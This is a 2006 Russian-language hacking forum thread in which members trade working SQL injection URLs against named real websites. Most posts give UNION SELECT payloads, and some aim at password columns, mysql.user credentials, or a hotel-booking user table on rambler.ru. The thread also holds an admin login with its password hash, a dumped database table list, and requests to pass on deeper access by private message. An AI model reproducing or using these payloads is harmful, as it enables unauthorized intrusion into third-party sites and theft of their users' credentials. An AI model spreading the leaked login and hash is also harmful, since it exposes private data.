SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    [daily.com.ua]


    Code:
    http://daily.com.ua/analytics/page.php?id=-1+union+select+1,password+from+users/*
    http://daily.com.ua/analytics/page.php?id=-1+union+select+1,login+from+users/*
    http://daily.com.ua/admin/index.php - админка
    [B]andrew:b9e464f282d8051b47e0e592c6f58aa2[/B]

    [www.pharm-system.com]


    Code:
    http://www.pharm-system.com/index.phtml?page=news&id=-1+union+select+1,2,3,4,5,6,7,8+from+users/*
    [www.khabibullin.kiev.ua]

    Code:
    http://www.khabibullin.kiev.ua/pabl_article_ua.php?page=1&id=-1+union+select+1,2/*

    [www.jimdunlop.com]
    (смотреть исходник)

    Code:
    http://www.jimdunlop.com/index.php?page=products/pip&id=-1+union+select+1,2,3,4,5,6,7,8,9/*

    [www.amtel.ru]

    Code:
    http://www.amtel.ru/page.php?id=-1+union+select+1,2,3/*
    [www.hillelisrael.org.il]
    Code:
    http://www.hillelisrael.org.il/page.php?table=Page&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
     
  2. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    PHP:
    http://www.rabidhardware.net/index.php?id=1'%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20/*
     
  3. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    http://best4her.net/shop.php?cat=-3%20union%20select%201,2,3,4,5,6,7,8,9,10,11/*&retail - online shop

    http://dendro.ru/?id=-4%20union%20select%201,2,3,4,5/*
     
    1 person likes this.
  4. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    _http://www.soundnation.net/article.php?a=-140+UNION+SELECT+1,2,3,4,5,6,7/*&mod=view
     
  5. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    http://blueshop.ru/details.php?product_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,user(),database(),13,14,15,16,17,18,19,20,21,22,23/*
     
  6. off

    off Banned

    Joined:
    21 Aug 2006
    Messages:
    55
    Likes Received:
    37
    Reputations:
    6
    http://www.libraries.iub.edu/error.php?errorId=-1+union+select+1,errorid,VERSION()+from+error+where+errorid=1/*

    если получится копнуть дальше, напишите в ПМ ;)
     
  7. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    http://www.libraries.iub.edu/error.php?errorId=-1+union+select+1,2,char(207,229,240,229,225,232,240,224,233,32,234,238,235,238,237,234,232)+from+admin/*
     
  8. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    _http://www.bilimdon.uz/news/index.php?news_id=307'
     
  9. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Найденна не мной раздроченна мной :)

    rambler.ru

    Code:
    _http://hotel.travel.rambler.ru/vitrina.asp?sDescr=1+or+1=(SELECT+TOP+1+cast(UserID+as+nvarchar)%2B%27%3A%27%2Bcast(UserEmail+as+nvarchar)%2B%27%3A%27%2Bcast(UserPass+as+nvarchar)+FROM+TUserFrame+where+userid=44)--
    id с 30 до 600 примерно.

    Структура:

    Code:
    [B]database : SBG [/B]
    TReq 
    vHotelData 
    TrCard 
    TBookPay 
    TPenalty 
    vHPL_117604143_7 
    TSubMenu 
    vHPL_415186118_3 
    vInsList 
    Import 
    vHPL_415181715_3 
    vHPL_924873809_3 
    vHPL_924884253_3 
    TrAgentType 
    vHPL_924918127_3 
    TExcursPL 
    vHPL_162626041_All 
    vBookPersons1 
    vBookPersons2 
    vHPL_735327103_1 
    vTransCar 
    vHPL_947446991_4 
    TSTBWork 
    TPageDetail 
    vHPL_162626041_5 
    vHPL_947446991_All 
    vHPL_924916560_10 
    vHPL_924916560_12 
    vHPL_924916560_11 
    vHPL_924916560_14 
    vHPL_924916560_13 
    vHPL_924916560_15 
    THotel_123 
    ALTERN 
    TrRoomAdd 
    TTransCar 
    TPayTransact 
    vFoodPL 
    vHotel2 
    vHotel1 
    TrService 
    TUserRekv 
    TIQueries 
    TAddPL 
    vAgent1 
    vAgent3 
    vTransListToHotel 
    vHPL_117604143_8 
    TrTourRegion 
    TrRegForm 
    TrLimitType 
    TrReclama 
    TYandexWork 
    TrTourRegionCity 
    TrStation 
    vBookAgent 
    vFoodPrice 
    vHPL_735327103_2 
    vRoomPrice 
    TSTB_Auth 
    TrBookStatus 
    TrPort 
    vHPL_947446991_5 
    vHPL_162626041_4 
    vHPL_924916560_6 
    vTransferAgent 
    EMailLog 
    vTransListFromHotel 
    sysconstraints 
    TRequestState 
    vHPL_889097699_5 
    vHPL_117604143_9 
    TOrdersRoom 
    TPortofolio 
    vHotelPriceList2 
    vBookRoomList 
    TBookExc 
    vAgent 
    vBookTransList 
    vHPL_415186118_2 
    vInsInfo 
    vHPL_415181715_2 
    vHPL_924873809_2 
    vHPL_924884253_2 
    vHPL_40370029_All 
    vHPL_924918127_2 
    TPaySystem 
    vBookRoomList2 
    vHPL_735327103_3 
    TrFoodType 
    vHPL_889097699_4 
    TBookIns 
    TPayment 
    TAccount 
    TRequest 
    TWorkEport 
    TrPayBasis 
    syssegments 
    TrTimeUnit 
    vFoodPriceList 
    TrRoomList 
    TTransList 
    TrRoomType 
    TTimer_Check 
    TrRegion 
    vHPL_415186118_1 
    vHPL_415181715_1 
    vHPL_924873809_1 
    vHPL_924884253_1 
    TMenu 
    TNews 
    TrRegion_Backup 
    TRate 
    TBook 
    TSpec 
    vHPL_924918127_1 
    TrCurrency 
    vTransListInHotel 
    Test 
    TFAQ 
    TRequirement 
    TRequestRoom 
    TFixedArrive 
    vHPL_735327103_4 
    TrInsType 
    TrEmbassy 
    vHPL_889097699_3 
    TTimer 
    TActionClass 
    vTransHotelPort 
    TrEmpType 
    vHPL_889097699_All 
    vTransCarBook 
    vHPL_947446991_1 
    vHPL_162626041_2 
    TInterfaces 
    vBookIns 
    vTransHotelStation 
    TTimerReq 
    DiscountConst 
    vHPl_Date2 
    vHPL_117604143_10 
    vHPL_117604143_12 
    vHPL_117604143_11 
    vHPL_117604143_14 
    vHPL_117604143_13 
    vHPL_117604143_15 
    TRoomReestr 
    TrHotelsAddServicesList 
    TAgentRights 
    TEportWork 
    TFixedAddPL 
    vFoodPriceList2 
    vHPL_735327103_5 
    TrTimerType 
    vHPL_415181715_All 
    TInsuranceList 
    TrRespStatus 
    THotel 
    TPayOrder 
    vInsuranceAgent 
    vHPL_947446991_2 
    TRequestAdd 
    vHPL_162626041_1 
    vTransList 
    vHPL_924916560_9 
    vTransListInput 
    vHPL_415186118_All 
    vHPL_924918127_All 
    vHPl_Date1 
    TQuest 
    TTrans 
    TOpros 
    TAgent 
    vHPL_924884253_All 
    vHPL_924873809_All 
    TrDocType 
    TrCarType 
    TOrderStatus 
    TrCountry 
    vTransListBookFrom 
    vBookInfoAgent 
    vHPL_40370029_1 
    vHPL_40370029_2 
    vHPL_40370029_3 
    vHPL_40370029_4 
    vHPL_40370029_5 
    vCarListInput 
    TBookPersons 
    TForumMessage 
    vBookPersonsCount 
    vHPL_924916560_8 
    vHPL_415186118_5 
    vHotelCodes 
    vTransListBookIn 
    vHPL_415181715_5 
    TrPayType 
    vHPL_924873809_5 
    vHPL_924884253_5 
    vHPL_924918127_5 
    vHPL_40273923_4 
    vHPL_40273923_3 
    vHPL_40273923_5 
    vHPL_40273923_2 
    vHPL_40273923_1 
    TrPenUnit 
    vHPL_889097699_2 
    TrCity 
    TBookAdd 
    TSpecList 
    TFoodList 
    dtproperties 
    vHPL_162626041_3 
    TrHotelType 
    vBookAgent1 
    THotHotel 
    TBookRoom 
    TBookFood 
    vBookSelect 
    vFoodInfo 
    TrSalePoint 
    THistoryBook 
    TrDistance 
    TrHotelsAddServices 
    TrAddPlace 
    vFoodType 
    TAllQueries 
    TOrders 
    vBookFood 
    vBookRoom 
    vBookInfo 
    TTimeLimit 
    TExcursion 
    TrReqStatus 
    TGroupHotel 
    TTypeHotel 
    TCarList 
    TBookTrans 
    vHPL_924916560_7 
    vHPL_415186118_4 
    vHPL_735327103_All 
    vHPL_415181715_4 
    TSpecLeft 
    vHPL_924873809_4 
     
    #89 guest3297, 26 Oct 2006
    Last edited: 26 Oct 2006
  10. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    http://shkola.lv/?mode=lsntheme&themeid=-1%20union%20select%201,2,3,4,5/*
    http://shkola.lv/index.php?mode=wgoods&page=uroki&lsnid=-12%20union%20select%201,2,3,4,5/*

    Кто сможет что-то достать, отпишитесь в ПМ плз, а то я "недовоткнул".
     
    #90 Fr-Ron, 26 Oct 2006
    Last edited: 26 Oct 2006
  11. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    forum.vbios.com
     
  12. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    gameland.ru

    Code:
    http://www.gameland.ru/articles2/catalog/game.asp?code=1'
    Code:
    ADODB.Recordset error '800a0bcd' 
    
    Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record. 
    
    /articles2/catalog/game.asp, line 202
     
    2 people like this.
  13. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    PHP:
    http://www.bustur.ru/t.php?id=1'
     
  14. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    Нашел еще одну...
    Гитаристы поймут ;)

    http://www.tablatures.tk/tabs.php?id=-243+UNION+SELECT+111111111111111111/*&page=1

    В самом верху - перед словом TABS.
    Там рядом пхпбб стоит, если кто смогёт оттуда инфу выдрать, расскажите плз в ПМ об этом.
     
  15. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Tayle.com
    Code:
    http://www.tayle.com/adv.php?aid=1%20union%20select%201,2,3,4/*
    XSS с него же здесь:
    http://forum.antichat.ru/threadedpost212700.html#post212700
     
  16. corsp_puttrider

    corsp_puttrider New Member

    Joined:
    16 Oct 2006
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Вот скуль

    _http://www.myvzfei.ru/news_detail.asp?id=1'
    кто пробьется дальше пишите в ПМ
     
  17. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Kitcom.ru
    Code:
    http://www.kitcom.ru/goods/index.php?gm=1%20union%20select%201,user,password%20from%20mysql.user
    
    Russobit - M
    Code:
    http://new.russobit-m.ru/?page=news&newsID=1 union select 1,2/*
    Koss.ru
    Code:
    http://www.koss.ru/news.php?id=1 union select 1,2,3,4,5/*
    Reviews.ru
    Code:
    http://www.reviews.ru/clause/article.asp?id=1'
    NetLab.ru
    Code:
    http://netlab.ru/news/hotnews/descr.asp?id=1'
    Computek.ru
    Code:
    http://computek.ru/docs/tpl/new.asp?id=1'
     
  18. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    VideoSite
    Code:
    http://videosite.ru/docs.php?id=7%20union%20select%201,2,3,4/*
    
    Portal-Club.com

    Code:
    http://www.portal-club.com/main.php?id=1%20union%20select%201,2/*
    
    Связной.Ру
    Code:
    http://svyaznoy.ru/index.php5?action=DAInfo58&SvyaznoyInfo=-1%20union%20select%201,2,3,4,5,6,7,8,9/*
    
    HpplaZa.ru
    Code:
    http://hpplaza.ru/catalog/details.asp?ware=1'
    
     
    2 people like this.
  19. corsp_puttrider

    corsp_puttrider New Member

    Joined:
    16 Oct 2006
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Скуль

    http://abris.info/price/mark1.asp?id=-1
     
  20. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    _http://www.allimitepatagonia.com.ar/productos.php?id_nexo=-2+UNION+SELECT+convert(version()%20using%20latin1),2/*
     
Thread Status:
Not open for further replies.